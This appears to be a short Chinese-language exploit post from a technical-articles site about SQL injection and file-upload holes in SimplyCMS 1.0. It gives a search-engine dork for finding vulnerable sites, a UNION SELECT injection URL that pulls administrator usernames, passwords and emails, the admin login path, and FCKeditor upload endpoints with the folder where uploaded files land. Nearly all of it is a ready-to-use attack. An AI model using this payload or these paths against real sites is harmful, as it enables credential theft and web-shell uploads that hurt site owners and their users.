您现在的位置: 首页技术文章>正文
SimplyCMS 1.0 SQl注入和上传漏洞
2012年05月28日 技术文章 暂无评论

批量:inurl:"index.php?subid=" "Powered by DST - SimplyCMS"
EXP:
http://127.0.0.1/index.php?subid=7[sql]
http://127.0.0.1/index.php?subid=7'+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf-- -
后台登入
http://127.0.0.1/cms/index.php
上传漏洞
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://127.0.0.1/cms/FCKeditor/editor/filemanager/upload/test.html
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/frmupload.html
你的文件地址:
http://127.0.0.1/cms/myFiles/Image/

给我留言